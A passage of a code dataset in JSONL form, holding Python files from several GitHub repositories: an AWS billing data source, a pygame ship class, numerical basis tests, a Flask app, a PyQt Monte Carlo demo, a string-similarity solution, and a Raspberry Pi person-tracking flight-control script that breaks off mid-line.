+{"seq_id":"40702347756","text":"import datetime\nimport time\n\nimport pandas as pd\n\nfrom bill_calculator_hep.AWSBillAnalysis import AWSBillCalculator\n\nfrom decisionengine.framework.modules import Source\nfrom decisionengine.framework.modules.Source import Parameter\nfrom decisionengine_modules.AWS.sources import DEAccountContants\n\n\n@Source.supports_config(\n Parameter(\n \"billing_configuration\",\n type=dict,\n comment=\"\"\"Configuration required to get AWS billing information. Supports the layout:\n\n {\n 'AWSRnDAccountConstants': {\n 'lastKnownBillDate': '08/01/16 00:00', # '%m/%d/%y %H:%M'\n 'balanceAtDate': 3839.16, # $\n 'accountName': 'RnD',\n 'accountNumber': 159067897602,\n 'credentialsProfileName': 'BillingRnD',\n 'applyDiscount': True, # DLT discount does not apply to credits\n 'costRatePerHourInLastSixHoursAlarmThreshold': 2, # $ / h # $10/h\n 'costRatePerHourInLastDayAlarmThreshold': 2, # $ / h # $10/h\n 'emailReceipientForAlarms': 'fermilab-cloud-facility-rnd@fnal.gov'\n }\n }\"\"\",\n ),\n Parameter(\"dst_dir_for_s3_files\", type=str, comment=\"Directory for AWS billing files\"),\n Parameter(\"verbose_flag\", type=bool),\n)\n@Source.produces(AWS_Billing_Info=pd.DataFrame, AWS_Billing_Rate=pd.DataFrame)\nclass BillingInfo(Source.Source):\n def __init__(self, config):\n super().__init__(config)\n acconts_config_file = config[\"billing_configuration\"]\n self.billing_files_location = config[\"dst_dir_for_s3_files\"]\n self.verbose_flag = int(config[\"verbose_flag\"])\n # Load known accounts configuration\n account_dict = DEAccountContants.load_constants(acconts_config_file)\n self.accounts = []\n for val in account_dict.values():\n self.accounts.append(DEAccountContants.AccountConstants(val))\n\n def acquire(self):\n \"\"\"\n Method to be called from Task Manager.\n redefines acquire from Source.py\n Acquire AWS billing info and return as pandas frame\n\n :rtype: :obj:`~pd.DataFrame`\n \"\"\"\n\n # get data for all accounts\n self.logger.debug(\"in BillingInfo acquire\")\n data = []\n datarate = []\n globalConf = {\n \"graphite_host\": \"dummy\",\n \"graphite_context_billing\": \"dummy\",\n \"outputPath\": self.billing_files_location,\n \"accountDirs\": 1,\n }\n for i in self.accounts:\n constantsDict = {\n \"credentialsProfileName\": i.credentialsProfileName,\n \"accountNumber\": i.accountNumber,\n \"bucketBillingName\": i.bucketBillingName,\n \"lastKnownBillDate\": i.lastKnownBillDate,\n \"balanceAtDate\": i.balanceAtDate,\n \"applyDiscount\": i.applyDiscount,\n }\n try:\n calculator = AWSBillCalculator(i.accountName, globalConf, constantsDict, self.logger)\n lastStartDateBilledConsideredDatetime, CorrectedBillSummaryDict = calculator.CalculateBill()\n self.logger.debug(f\"lastStartDateBilledConsideredDatetime: {lastStartDateBilledConsideredDatetime}\")\n self.logger.debug(f\"CorrectedBillSummaryDict: {CorrectedBillSummaryDict}\")\n # data is a list, CorrectedBillSummaryDict is a dict, so we have to append it as a list of dict.\n # data += calculator.CorrectedMonthlyBillSummaryList\n data += [CorrectedBillSummaryDict]\n #\n # This is the code to calculate 6hr and 24hr spend rate\n dateNow = datetime.datetime.today()\n # Get cost in the last 6 hours\n sixHoursBeforeLastDateBilledDatetime = lastStartDateBilledConsideredDatetime - datetime.timedelta(\n hours=6\n )\n calculator.setLastKnownBillDate(sixHoursBeforeLastDateBilledDatetime.strftime(\"%m/%d/%y %H:%M\"))\n newLastStartDateBilledDatetime, CorrectedBillSummarySixHoursBeforeDict = calculator.CalculateBill()\n costInLastSixHours = CorrectedBillSummarySixHoursBeforeDict[\"Total\"]\n costRatePerHourInLastSixHours = costInLastSixHours / 6\n # Get cost in the last 24 hours\n oneDayBeforeLastDateBilledDatetime = lastStartDateBilledConsideredDatetime - datetime.timedelta(\n hours=24\n )\n calculator.setLastKnownBillDate(oneDayBeforeLastDateBilledDatetime.strftime(\"%m/%d/%y %H:%M\"))\n newLastStartDateBilledDatetime, CorrectedBillSummaryOneDayBeforeDict = calculator.CalculateBill()\n\n costInLastDay = CorrectedBillSummaryOneDayBeforeDict[\"Total\"]\n costRatePerHourInLastDay = costInLastDay / 24\n dataDelay = int(\n (time.mktime(dateNow.timetuple()) - time.mktime(lastStartDateBilledConsideredDatetime.timetuple()))\n / 3600\n )\n\n dataratedict = {\n \"accountName\": i.accountName,\n \"lastStartDateBilledConsideredDatetime\": lastStartDateBilledConsideredDatetime,\n \"dataDelay\": dataDelay,\n \"costInLastSixHours\": costInLastSixHours,\n \"costInLastDay\": costInLastDay,\n \"costRatePerHourInLastSixHours\": costRatePerHourInLastSixHours,\n \"costRatePerHourInLastDay\": costRatePerHourInLastDay,\n }\n datarate += [dataratedict]\n if self.verbose_flag:\n self.logger.debug(\"---\")\n self.logger.debug(\n f\"Alarm Computation for {calculator.accountName} Account Finished at {time.strftime('%c')}\"\n )\n self.logger.debug(\"\")\n self.logger.debug(\n f\"Last Start Date Billed Considered: {lastStartDateBilledConsideredDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(f\"Now {dateNow.strftime('%m/%d/%y %H:%M')}\")\n self.logger.debug(f\"delay between now and Last Start Date Billed Considered in hours {dataDelay}\")\n self.logger.debug(\n f\"Six hours before that: {sixHoursBeforeLastDateBilledDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(\n f\"One day before that: {oneDayBeforeLastDateBilledDatetime.strftime('%m/%d/%y %H:%M')}\"\n )\n self.logger.debug(\n f\"Adjusted Total Now from Date of Last Known Balance: ${CorrectedBillSummaryDict['Total']}\"\n )\n self.logger.debug(\"\")\n self.logger.debug(f\"Cost In the Last Six Hours: ${costInLastSixHours}\")\n self.logger.debug(f\"Cost Rate Per Hour In the Last Six Hours: ${costRatePerHourInLastSixHours} / h\")\n self.logger.debug(\"\")\n self.logger.debug(f\"Cost In the Last Day: ${costInLastDay}\")\n self.logger.debug(f\"Cost Rate Per Hour In the Last Day: ${costRatePerHourInLastDay} / h\")\n self.logger.debug(\"---\")\n self.logger.debug(\"\")\n\n except Exception as detail:\n self.logger.exception(\"Exception in AWS BillingInfo call to acquire\")\n raise Exception(detail)\n\n return {\"AWS_Billing_Info\": pd.DataFrame(data), \"AWS_Billing_Rate\": pd.DataFrame(datarate)}\n\n\nSource.describe(\n BillingInfo,\n sample_config={\n \"billing_configuration\": \"/etc/decisionengine/modules.conf/AccountConstants_my.py\",\n \"dst_dir_for_s3_files\": \"/var/lib/decisionengine/awsfiles\",\n },\n)\n","repo_name":"HEPCloud/decisionengine_modules","sub_path":"src/decisionengine_modules/AWS/sources/BillingInfo.py","file_name":"BillingInfo.py","file_ext":"py","file_size_in_byte":7821,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"33948648146","text":"import pygame\nfrom settings import Settings\n\nclass Ship:\n \"\"\"A class to manage the ship\"\"\"\n\n def __init__(self, galaga_game):\n \"\"\"Initialize the ship and set its starting position\"\"\"\n self.screen = galaga_game.screen\n self.screen_rect = galaga_game.screen.get_rect()\n self.settings = galaga_game.settings\n self.galaga_game = galaga_game\n\n # Load ths ship image and get its rect\n self.image = pygame.image.load(self.settings.ship_image) \n self.rect = self.image.get_rect()\n\n # Start each new ship at the bottom center of the screen.\n self.rect.midbottom = self.screen_rect.midbottom\n\n # Move right flag; start with a ship that's not moving.\n self.moving_right = False \n self.moving_left = False\n\n def update(self):\n \"\"\"Update the ship's position based on the movement flag\"\"\"\n if self.moving_right:\n if self.rect.x <= self.galaga_game.screen_width - self.rect.width:\n self.rect.x += self.settings.ship_speed\n elif self.moving_left:\n if self.rect.x >= 0:\n self.rect.x -= self.settings.ship_speed\n\n def blitme(self):\n \"\"\"Draw the ship at its current location.\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def center_ship(self):\n \"\"\"Center the ship on the screen\"\"\"\n self.rect.midbottom = self.screen_rect.midbottom\n self.x = float(self.rect.x)\n\n\n ","repo_name":"daviddelavega/GalagaPythonGame","sub_path":"galaga/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28968922841","text":"from unittest.case import SkipTest\n\nimport numpy as np\n\nfrom aspire.image import Image\nfrom aspire.utils import gaussian_2d, utest_tolerance\nfrom aspire.utils.coor_trans import grid_2d\nfrom aspire.utils.random import randn\n\n\nclass Steerable2DMixin:\n def testIndices(self):\n ell_max = self.basis.ell_max\n k_max = self.basis.k_max\n\n indices = self.basis.indices()\n\n i = 0\n\n for ell in range(ell_max + 1):\n if ell == 0:\n sgns = [1]\n else:\n sgns = [1, -1]\n\n for sgn in sgns:\n for k in range(k_max[ell]):\n self.assertTrue(indices[\"ells\"][i] == ell)\n self.assertTrue(indices[\"sgns\"][i] == sgn)\n self.assertTrue(indices[\"ks\"][i] == k)\n\n i += 1\n\n def testGaussianExpand(self):\n # Offset slightly\n x0 = 0.50\n y0 = 0.75\n\n # Want sigma to be as large as possible without the Gaussian\n # spilling too much outside the central disk.\n sigma = self.L / 8\n im1 = gaussian_2d(\n self.L, x0=x0, y0=y0, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype\n )\n\n coef = self.basis.expand(im1)\n im2 = self.basis.evaluate(coef)\n\n if isinstance(im2, Image):\n im2 = im2.asnumpy()\n im2 = im2[0]\n\n # For small L there's too much clipping at high freqs to get 1e-3\n # accuracy.\n if self.L < 32:\n atol = 1e-2\n else:\n atol = 1e-3\n\n self.assertTrue(im1.shape == im2.shape)\n self.assertTrue(np.allclose(im1, im2, atol=atol))\n\n def testIsotropic(self):\n sigma = self.L / 8\n im = gaussian_2d(self.L, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype)\n\n coef = self.basis.expand(im)\n\n ells = self.basis.indices()[\"ells\"]\n\n energy_outside = np.sum(np.abs(coef[ells != 0]) ** 2)\n energy_total = np.sum(np.abs(coef) ** 2)\n\n energy_ratio = energy_outside / energy_total\n\n self.assertTrue(energy_ratio < 0.01)\n\n def testModulated(self):\n if self.L < 32:\n raise SkipTest\n\n ell = 1\n\n sigma = self.L / 8\n im = gaussian_2d(self.L, sigma_x=sigma, sigma_y=sigma, dtype=self.dtype)\n\n g2d = grid_2d(self.L)\n\n for trig_fun in (np.sin, np.cos):\n im1 = im * trig_fun(ell * g2d[\"phi\"])\n\n coef = self.basis.expand(im1)\n\n ells = self.basis.indices()[\"ells\"]\n\n energy_outside = np.sum(np.abs(coef[ells != ell]) ** 2)\n energy_total = np.sum(np.abs(coef) ** 2)\n\n energy_ratio = energy_outside / energy_total\n\n self.assertTrue(energy_ratio < 0.10)\n\n def testEvaluateExpand(self):\n coef1 = randn(self.basis.count, seed=self.seed)\n coef1 = coef1.astype(self.dtype)\n\n im = self.basis.evaluate(coef1)\n if isinstance(im, Image):\n im = im.asnumpy()\n coef2 = self.basis.expand(im)[0]\n\n self.assertTrue(coef1.shape == coef2.shape)\n self.assertTrue(np.allclose(coef1, coef2, atol=utest_tolerance(self.dtype)))\n\n def testAdjoint(self):\n u = randn(self.basis.count, seed=self.seed)\n u = u.astype(self.dtype)\n\n Au = self.basis.evaluate(u)\n if isinstance(Au, Image):\n Au = Au.asnumpy()\n\n x = randn(*self.basis.sz, seed=self.seed)\n x = x.astype(self.dtype)\n\n ATx = self.basis.evaluate_t(x)\n\n Au_dot_x = np.sum(Au * x)\n u_dot_ATx = np.sum(u * ATx)\n\n self.assertTrue(Au_dot_x.shape == u_dot_ATx.shape)\n self.assertTrue(np.isclose(Au_dot_x, u_dot_ATx))\n","repo_name":"yunpeng-shi/ASPIRE-Python","sub_path":"tests/_basis_util.py","file_name":"_basis_util.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"}
+{"seq_id":"31280609196","text":"import sys\nfrom flask import Flask, jsonify, request, render_template\nfrom build_graphs import build_graphs \n# testfile = \"/Users/main/Desktop/Coding/castle_dash_test/dashboard_challenge/castle_users.json\"\n\napp = Flask(__name__)\napp.config['PROPAGATE_EXCEPTIONS'] = True\n\n@app.route('/')\ndef home():\n\treturn render_template(\"index.html\")\n\nif __name__ == '__main__':\n\tinput = sys.argv[1]\n\tprint('input file name is ==>', input)\n\tbuild_graphs(input)\n\n\tapp.run(debug=True, use_reloader=False)\n","repo_name":"tsyaeger/cstl_dashboard","sub_path":"dashboard_challenge/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"30091726150","text":"from UI import Ui_Frame\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget\nfrom PyQt5.QtGui import QPainter, QBrush, QFont\nfrom PyQt5.QtCore import Qt, QRectF, QPoint, QRect\nimport sys, random, math\n\nclass Win(QMainWindow, Ui_Frame):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.clickfoo)\n self.valueIsSet = False\n\n def clickfoo(self):\n self.dataInit()\n self.monteCarlo()\n self.update()\n\n def dataInit(self):\n self.valueIsSet = True\n self.N = int(self.lineEdit.text())\n self.P = int(self.lineEdit_2.text())\n\n def monteCarlo(self):\n allPoint = [[random.uniform(0, 1), random.uniform(0, 1)]\n for i in range(self.N)]\n counter = 0\n self.underPoint = []\n self.upperPoint = []\n for point in allPoint:\n if point[1] <= math.pow(point[0], self.P):\n counter += 1\n self.underPoint.append(point)\n else:\n self.upperPoint.append(point)\n Area = counter / self.N\n self.label_3.setText(\"面積大約為{}\".format(Area))\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.setFont(QFont(\"Monospace\", 15))\n painter.setPen(Qt.white)\n painter.drawLine(600, 150, 1100, 150)\n painter.drawLine(600, 150, 600, 650)\n # draw Function\n if self.valueIsSet:\n for i in range(1000):\n tmp = i / 1000\n painter.drawPoint(600 + tmp * 500, 150 + math.pow(tmp, self.P) * 500)\n for point in self.underPoint:\n x = point[0]\n y = point[1]\n painter.drawPoint(600 + x * 500, 150 + y * 500)\n painter.setPen(Qt.red)\n for point in self.upperPoint:\n x = point[0]\n y = point[1]\n painter.drawPoint(600 + x * 500, 150 + y * 500)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Win()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"eeeXun/homework","sub_path":"semester4/algorithm2-2/demo3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"70198406821","text":"import math\nfrom collections import Counter\n\n \n\ndef solution(str1, str2):\n \n str1 = str1.upper()\n str2 = str2.upper()\n\n tmp = []\n tmp2 = []\n\n for i in range(0, len(str1)-1):\n if str1[i] == ' ' or str1[i+1] == ' ':\n continue\n if str1[i].isdigit() or str1[i+1].isdigit():\n continue\n if not(str1[i].isalpha()) or not(str1[i+1].isalpha()):\n continue\n\n tmp.append( str1[i] + str1[i+1] ) \n\n for i in range(0, len(str2)-1):\n if str2[i] == ' ' or str2[i+1] == ' ':\n continue\n if str2[i].isdigit() or str2[i+1].isdigit():\n continue\n if not(str2[i].isalpha()) or not(str2[i+1].isalpha()):\n continue\n\n tmp2.append( str2[i] + str2[i+1] )\n\n \n #print(tmp)\n #print(tmp2)\n\n\n if len(tmp) == 0 and len(tmp2) == 0: # 숫자나 공백, 특문때문에 전부 제거된 경우 예외처리 \n ans = 65536\n return ans\n else:\n c1 = Counter(tmp)\n c2 = Counter(tmp2)\n \n intersec = c1 & c2\n intersec = sum(list(intersec.values()))\n union = c1 | c2\n union = sum(list(union.values()))\n \n ans = intersec/union * 65536\n '''\n common = 0\n\n adding = 0\n\n \n\n tmp3 = tmp2\n\n # 두 리스트 공통 찾는 로직 ( set을 쓸 수가 없음 )\n\n for i in range(len(tmp)):\n for j in range(len(tmp3)):\n if tmp[i] == tmp3[j]:\n common += 1\n tmp3[j] == ''\n break\n\n \n\n adding = len(tmp) + len(tmp2) - common\n\n \n\n a = common\n\n b = adding\n \n #print(common, adding)\n\n ans = a/b * 65536\n\n ans = math.floor(ans) # 내림 \n\n '''\n\n '''\n\n tmp = set(tmp)\n\n tmp2 = set(tmp2)\n\n \n\n print(tmp)\n\n print(tmp2)\n\n \n\n a = len(tmp & tmp2) # 교집합\n\n b = len(tmp | tmp2) # 합집합\n\n \n\n ans = a/b * 65536\n\n '''\n\n #print(int(ans))\n return int(ans)\n\n\n#solution('FRANCE', 'french') \n#solution('handshake', 'shake hands')\n#solution('aa1+aa2', 'AAAA12') \n#solution('E=M*C^2', 'e=m*c^2')\n","repo_name":"JuyeolRyu/CodingTest","sub_path":"백수/algorithm/카카오/2018 KaKao Blind Recruitment/young/[1차] 뉴스 클러스터링/[1차] 뉴스 클러스터링.py","file_name":"[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"71186578661","text":"import tflite_runtime.interpreter as interpreter\nimport numpy as np\nimport RPi.GPIO as GPIO\nimport cv2 as cv\nimport sys\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport smbus2\nfrom centroidtracker import CentroidTracker\nfrom threading import Thread\nfrom picamera2 import Picamera2\n\nclass VideoStream:\n def __init__(self):\n global imgW,imgH\n self.piCam = Picamera2()\n self.piCam.configure(self.piCam.create_preview_configuration())\n self.piCam.start()\n self.frame = []\n self.stopEx = False\n imgH,imgW = self.piCam.capture_array().shape[:2]\n # def start(self): #to run on a separate thread\n # Thread(target=self.update,args=()).start()\n # return self\n\n # def update(self):\n # while not self.stopEx:\n # self.frame = self.piCam.capture_array()[:,:,:3]\n\n def update(self):\n self.frame = cv.rotate(self.piCam.capture_array()[:,:,:3],cv.ROTATE_180)\n \n def getInstance(self):\n return self\n\n def read(self):\n return np.array(self.frame.copy())\n\n def stop(self):\n self.stopEx = True\n \nclass Detect:\n def __init__(self, stream):\n global imgW,imgH\n labels = 'labelmap.txt'\n model_path = 'detect.tflite'\n \n self.is_tracking = False #TODO\n\n self.stream = stream\n self.model = interpreter.Interpreter(model_path=model_path,num_threads=4)\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n input_tensor_index = self.input_details[0]['index']\n\n self.mean = 127.5\n self.std = 127.5\n\n self.frame = []\n while len(self.frame) == 0:\n self.frame = stream.read()\n\n self.imgW_resize = 300 #frame.shape[1]\n self.imgH_resize = 300 #frame.shape[0]\n\n # config = np.array([1,self.imgH_resize,self.imgW_resize,3],dtype=np.int32)\n # model.resize_tensor_input(input_tensor_index, config)\n self.model.allocate_tensors()\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n self.confidence_thresh = 0.52\n self.boxes_id, self.classes_id, self.scores_id = 0, 1, 2\n\n self.stopped = False\n\n self.label = ''\n with open(labels,'r') as f:\n self.label = f.read()\n\n self.label = self.label.split('\\n')\n if self.label[0] == '???':\n del(self.label[0])\n def getInstance(self):\n return self\n def start(self,poly=None):\n self.stopped = False\n print(\" Started tracking .........\")\n self.ct = CentroidTracker()\n Thread(target=self.detect,args=(poly,)).start()\n\n def isIn(self,rects,points,cd = False):\n \n for i,(xmin,ymin,xmax,ymax) in enumerate(rects):\n flag = False\n for x,y in points:\n if x < xmin or x > xmax or y < ymin or y > ymax:\n flag = True\n break\n if not flag:\n if cd:\n dist = math.dist(((xmin+xmax)/2,(ymin+ymax)/2),points[0])\n print('distance -> ',dist)\n if dist < 30:\n return i\n continue\n return i\n return -1\n def detect(self,poly=None):\n global is_tracking,bbox_coordinates\n self.poly = poly\n locked_on = False\n if self.poly == None:\n is_tracking = False\n triggerDetection()\n\n global frames\n id = -1\n while not self.stopped:\n self.frame = self.stream.read()\n frame_inp = self.frame.copy()\n frame_inp = cv.resize(frame_inp,(self.imgW_resize,self.imgH_resize),cv.INTER_AREA)\n if self.input_details[0]['dtype'] == np.float32:\n frame_inp = (frame_inp - self.mean)/self.std\n frame_inp = np.expand_dims(frame_inp,axis=0)\n \n self.model.set_tensor(self.input_details[0]['index'],frame_inp)\n self.model.invoke()\n\n boxes = self.model.get_tensor(self.output_details[self.boxes_id]['index'])[0]\n classes = self.model.get_tensor(self.output_details[self.classes_id]['index'])[0]\n scores = self.model.get_tensor(self.output_details[self.scores_id]['index'])[0]\n\n scores_sorted = list(reversed(np.argsort(scores,axis=0)))\n \n\n d_rects = []\n # print(scores_sorted)\n for i in scores_sorted[:4]:\n # print('detected -> ',classes[i])\n if (scores[i] < self.confidence_thresh or scores[i] > 1.0) or int(classes[i]) != 0:\n continue\n ymin = int(max(1,imgH*boxes[i][0]))\n xmin = int(max(1,imgW*boxes[i][1]))\n ymax = int(min(imgH,imgH*boxes[i][2]))\n xmax = int(min(imgW,imgW*boxes[i][3]))\n if id == -1:\n cv.rectangle(self.frame,(xmin,ymin),(xmax,ymax),(255,0,0),3)\n d_rects.append([xmin,ymin,xmax,ymax])\n\n if id == -1:\n id = self.isIn(d_rects,self.poly)\n if id == -1 and not is_tracking:\n is_tracking = False\n triggerDetection()\n\n objects = self.ct.update(rects=d_rects)\n \n # if locked_on and id not in list(objects.keys()):\n # is_tracking = False\n # triggerDetection()\n #print('id -> ',id,' poly -> ',self.poly,' rects -> ',d_rects)\n if not locked_on and id != -1:\n id = int(list(objects.keys())[id])\n locked_on = True\n \n else:\n try:\n centroid = objects[id]\n text = \"Tracking tis idiot {}\".format(id)\n cv.putText(self.frame, text, (centroid[0] - 10, centroid[1] - 10),cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv.circle(self.frame, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n except:\n is_tracking = False\n triggerDetection()\n \n if locked_on:\n rect_id = self.isIn(d_rects,list([objects[id]]),cd=True)\n if(rect_id != -1):\n cv.rectangle(self.frame,d_rects[rect_id][:2],d_rects[rect_id][-2:],(255,0,0),3)\n bbox_coordinates = (d_rects[rect_id][:2],d_rects[rect_id][-2:])\n # if not self.is_tracking:\n # pass #TODO\n\n frames['detection'] = self.frame\n\n def stop(self):\n self.stopped = True\n\nclass PoseDetection: # 0 - jesus pose\n def __init__(self,stream):\n global imgW,imgH,is_tracking\n self.stream = stream\n \n model_path = 'pose.tflite'\n self.model = interpreter.Interpreter(model_path=model_path,num_threads=2)\n self.model.allocate_tensors()\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n self.input_index = self.input_details[0]['index']\n self.output_index = self.output_details[0]['index']\n\n self.stopped = False\n\n self.imgH_resize,self.imgW_resize = self.input_details[0]['shape_signature'][1:3]\n print(self.imgH_resize,self.imgW_resize)\n print('\\n')\n print(imgW,imgH)\n # print(self.input_details)\n # print('\\n')\n # print(self.output_details)\n def getInstance(self):\n return self\n\n def start(self):\n self.stopped = False\n print(\" Started detecting pose .........\")\n Thread(target=self.getPose,args=()).start()\n\n def getRect(self):\n return self.rect\n\n def getPose(self):\n global frames,is_tracking,imgW,imgH\n hw = [imgH,imgW]\n while not self.stopped:\n frame = self.stream.read()\n frame_inp = cv.resize(frame,(self.imgH_resize,self.imgW_resize),interpolation=cv.INTER_AREA)\n frame_inp = np.array(np.expand_dims(frame_inp,axis=0),dtype=np.float32)\n\n self.model.set_tensor(self.input_index,frame_inp)\n self.model.invoke()\n\n keypoints = self.model.get_tensor(self.output_index)[0][0]\n for i, keypoint in enumerate(keypoints):\n keypoints[i][:2] = np.multiply(keypoint[:2],hw)\n # print('keypoints -> ',keypoints[i][:2])\n # print(keypoints)\n self.rect = self.estimatePose(keypoints)\n if(self.rect != None):\n # print('detected ')\n is_tracking = True\n triggerDetection()\n\n for keypoint in keypoints:\n if keypoint[2] < 0.3:\n continue\n cv.circle(frame,(int(keypoint[1]),int(keypoint[0])),4,(255,0,0),-1)\n frames['detection'] = frame\n\n \n def estimatePose(self,keypoints):\n points = np.arange(5,11)\n for point in points:\n if keypoints[point][2] < 0.4:\n return None\n dist_wrists = math.dist(keypoints[9][:2], keypoints[10][:2])\n dist_sum = math.dist(keypoints[5][:2],keypoints[6][:2])\n for i in range(2):\n dist_sum += math.dist(keypoints[5+i*2][:2],keypoints[5+(i+1)*2][:2])\n dist_sum += math.dist(keypoints[6+i*2][:2],keypoints[6+(i+1)*2][:2])\n if abs(dist_sum - dist_wrists) < dist_sum/7:\n return [keypoints[5][:2],keypoints[6][:2],keypoints[11][:2],keypoints[12][:2]]\n return None\n \n def stop(self):\n self.stopped=True\n\nclass PID:\n def __init__(self):\n global imgW, imgH,prev_box_mid\n self.kp = 0.5\n self.kd = 0.3\n self.ki = 0.001\n self.center = prev_box_mid = [imgW//2,imgH//2]\n self. total_area = imgW*imgH\n self.prev_time = time.time()\n\n def calcPID(self):\n global bbox_coordinates,prev_box_mid,curr_mid, prev_area\n curr_area = abs(bbox_coordinates[0][0] - bbox_coordinates[1][0])*abs(bbox_coordinates[0][1] - bbox_coordinates[1][1])\n curr_mid = ((bbox_coordinates[0][0]+bbox_coordinates[1][0])/2,(bbox_coordinates[0][1]+bbox_coordinates[1][1])/2)\n\n # Pid correction -> rudder\n errorX = self.center[0] - curr_mid[0]\n dx = curr_mid[0] - prev_box_mid[0]\n dt = time.time() - self.prev_time\n\n pidPX = int(self.kp*errorX)\n pidDX = int(self.kd*dx/dt)\n pidIX = 0\n if abs(errorX) < 50:\n pidIX = int(self.ki*errorX)\n prev_box_mid = curr_mid\n pid_rudder = pidDX + pidDX + pidIX\n\n errorZ = self.total_area - curr_area\n dz = curr_area - prev_area\n pidPZ = int(errorZ/1000)\n pidDZ = int(self.kd*dz/dt)\n pid_alieron = pidPZ + pidDZ\n\n self.prev_time = time.time()\n if curr_area > 0.4*self.total_area:\n pid_alieron = 0\n\n return pid_rudder,pid_alieron\n \n\ndef triggerDetection():\n global detect,pdetect,is_tracking,switch_state\n if is_tracking:\n poly = pdetect.getRect()\n pdetect.stop()\n detect.start(poly) \n switch_state = 1\n else:\n detect.stop()\n pdetect.start()\n switch_state=0\n\ndef read_from_arduino():\n global data,data_available\n try:\n data = bus.read_i2c_block_data(ADDR,0,30)\n data = [chr(s) for s in data]\n data = ''.join(data).split('#')\n data = data[1:-1]\n # print(data)\n data = [int(x) for x in data]\n data_available = True\n except:\n print('An error has occurred')\n data_available = False\n\ndef write_to_arduino(data):\n global switch_state\n data = data.copy()\n if len(data) > 2:\n data.append(switch_state)\n data_str = '#'.join(map(str,data))\n data = list(bytes(data_str,'utf-8'))\n print(data_str,data)\n try:\n bus.write_i2c_block_data(ADDR, 0, data)\n except:\n print('error')\n\ndef record_footage():\n global frames,stream\n output= cv.VideoWriter('footage',cv.VideoWriter_fourcc(*'XVID'),25,frames['detection'])\n \n while not stream.stopEx:\n output.write(frames['detection'])\n output.release()\n\n\ndef isr(channel): \n global pdetect,detect,data_available,is_tracking\n # print('#########################test############################') \n if GPIO.input(channel):\n ctr = 0\n while not data_available and ctr < 10:\n read_from_arduino()\n ctr+=1\n if data_available:\n triggerDetection()\n else:\n data_available=False\n pdetect.stop()\n detect.stop()\n is_tracking=False\n write_to_arduino([0])\n\n######################### without external mcu\n\n# def calcPWM(channel):\n# global pwm_vals,pwm_counts\n# if GPIO.input(channel):\n# started = time.time()\n# else:\n# pulse_width = time.time()-started\n# pwm_vals[channel] += pulse_width\n# pwm_counts[channel] += 1\n\n# def getPWM():\n# global pwm_in,pwm_counts\n# GPIO.add_event_detect(pwm,GPIO.BOTH,calcPWM)\n# sleep(3)\n# GPIO.remove_event_detect(pwm)\n# if 0 in pwm_counts.values():\n# return False\n# pwm_vals = {x:float(pwm_vals[x]/pwm_counts[x]) for x in list(pwm_vals.keys())}\n# print(pwm_vals)\n# return True\n#pins normally high -> 3,5,7,24,26\n#pins 13 and 15\n# switch_pin = 3\n# pwm_in = (10,11,12,13,15) #pins for reading pwm signals -> (aileron, rudder)\n# pwm_out = (5,7,24,26,16)\n# pwm_vals = {10:1000,11:1000,12:1000,13:1000,15:1000}\n# pwm_counts = {10:0,11:0,12:0,13:0,15:0}\n\n#########################\nADDR = 0x09\ninterrupt = 7\n\nimgW = imgH = 0\nis_tracking = False\nframes = dict({'detection' : np.ones(shape=(640,480,3),dtype=np.float32)})\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(interrupt,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n\nGPIO.add_event_detect(interrupt,GPIO.BOTH,isr)\n\nbus = smbus2.SMBus(1)\n######################## without external mcu\n\n# GPIO.setup(pwm_in,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n# GPIO.setup(pwm_out,GPIO.OUT)\n# GPIO.output(pwm_out,GPIO.LOW)\n########################\n\ndata_available = False #input pwm values from arduino\ndata=[0] #format - option, rudder, elevator, aileron, gps select\nswitch_state = 0\n\nbbox_coordinates = [[0,0],[0,0]]\nprev_box_mid = (0,0)\nprev_area = imgH*imgW\n\nstream = VideoStream().getInstance()\nstream.update()\ntime.sleep(1)\npdetect = PoseDetection(stream=stream).getInstance()\ndetect = Detect(stream=stream).getInstance()\npid = PID()\n# print(detect,pdetect)\n\nprev_time = time.time()\n\n# Thread(target=record_footage,args=()).start() # uncomment for enabling video recording\nwhile True:\n stream.update()\n cv.imshow('detected',cv.cvtColor(frames['detection'],cv.COLOR_BGR2RGB))\n\n if(data_available):\n PidX,PidZ = pid.calcPID()\n PidX = -PidX\n # print(Pid)\n dup_data = data.copy()\n dup_data[1] += PidX\n # dup_data[3] += PidZ #Enable for aileron control\n # i2c_time = time.time()\n if(time.time() - prev_time > 0.50):\n write_to_arduino(dup_data)\n prev_time = time.time()\n # print('i2c time 